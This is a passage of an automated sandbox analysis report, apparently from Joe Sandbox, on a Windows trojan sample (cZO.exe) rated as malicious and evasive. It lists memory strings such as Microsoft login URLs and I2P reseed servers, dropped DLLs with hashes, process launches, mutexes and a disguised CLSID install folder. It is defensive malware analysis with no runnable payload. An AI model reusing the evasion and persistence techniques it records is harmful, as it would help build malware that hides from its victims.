Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023782849.000001D37935A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263875376.000001D3798C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfI
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262697506.000001D378ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfU
Source: svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfU
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-fr.i2pd.xyz/#
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-fr.i2pd.xyz/p
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/i2pseeds.su3
Source: main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/i2pseeds.su30
Source: main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz:443/i2pseeds.su3
Source: main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz:443/i2pseeds.su3T
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.diva.exchange/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.diva.exchange/b.c
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/P#
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su3
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su30
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io/hP#
Source: main.exe, 00000016.00000003.2471943070.000002235030D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471338802.0000022350309000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471413512.000002235030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/&
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/7
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/??
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/b.c
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed2.i2p.net/
Source: svchost.exe, 0000001F.00000003.3023799636.000001D379355000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/J
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572929A inet_addr,ntohl,6_2_00007FF77572929A
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,6_2_00007FF77572292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\sdjnUb5S
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D4B4A0_2_024D4B4A
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D5B3E0_2_024D5B3E
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024E53EA0_2_024E53EA
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024E701E0_2_024E701E
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D60CE0_2_024D60CE
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024ED1220_2_024ED122
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D7F2E0_2_024D7F2E
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D9CF60_2_024D9CF6
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024DCDA60_2_024DCDA6
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572DE8A6_2_00007FF77572DE8A
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572E4E06_2_00007FF77572E4E0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE04209822_2_00007FF6BE042098
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE03C4C022_2_00007FF6BE03C4C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91609C022_2_00007FF8B91609C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91925F022_2_00007FF8B91925F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA4FF02022_2_00007FF8BA4FF020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB3CBC022_2_00007FF8BFB3CBC0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB5EB4022_2_00007FF8BFB5EB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A8B522_2_00007FF8BFB8A8B5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A78B22_2_00007FF8BFB8A78B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB9071022_2_00007FF8BFB90710
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A64322_2_00007FF8BFB8A643
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A55822_2_00007FF8BFB8A558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B91609C032_2_00007FF8B91609C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B91925F032_2_00007FF8B91925F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BA50F02032_2_00007FF8BA50F020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB3CBC032_2_00007FF8BFB3CBC0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB5EB4032_2_00007FF8BFB5EB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB8A8B532_2_00007FF8BFB8A8B5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB8A78B32_2_00007FF8BFB8A78B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB9071032_2_00007FF8BFB90710
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB8A64332_2_00007FF8BFB8A643
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB8A55832_2_00007FF8BFB8A558
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll 5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll 64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: String function: 00007FF7757214E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9181292 appears 1030 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB3A202 appears 690 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB81292 appears 754 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB52FD2 appears 774 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF6BE0399E2 appears 303 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BA501292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BA4F1292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9151292 appears 924 times
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: termsrv32.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: I77yQ5in.22.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: o6oDuAJl.22.drStatic PE information: Number of sections : 11 > 10
Source: OwuZZod2.22.drStatic PE information: Number of sections : 11 > 10
Source: evtsrv.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: cZO.exeStatic PE information: Number of sections : 11 > 10
Source: XpOp833v.22.drStatic PE information: Number of sections : 11 > 10
Source: GmdNT1AN.22.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: EgwqOk24.22.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: YXkdIYk6.22.drStatic PE information: Number of sections : 11 > 10
Source: YkhL6reh.22.drStatic PE information: Number of sections : 11 > 10
Source: cZO.exe, 00000000.00000000.2004898378.00000000007B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntegrator.exe@ vs cZO.exe
Source: cZO.exe, 00000000.00000002.2007514026.00000000025F4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs cZO.exe
Source: cZO.exe, 00000001.00000002.3262898232.0000000002724000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs cZO.exe
Source: cZO.exeBinary or memory string: OriginalFilenameIntegrator.exe@ vs cZO.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@46/72@4/59
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,6_2_00007FF77572855D
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77573B558 DeleteCriticalSection,FindClose,FindNextFileA,FindResourceA,6_2_00007FF77573B558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE038C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF6BE038C4A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE038C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF6BE038C4A
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess6524
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
Source: C:\Users\user\Desktop\cZO.exeFile created: C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.batJump to behavior
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
Source: cZO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: cZO.exeVirustotal: Detection: 19%
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
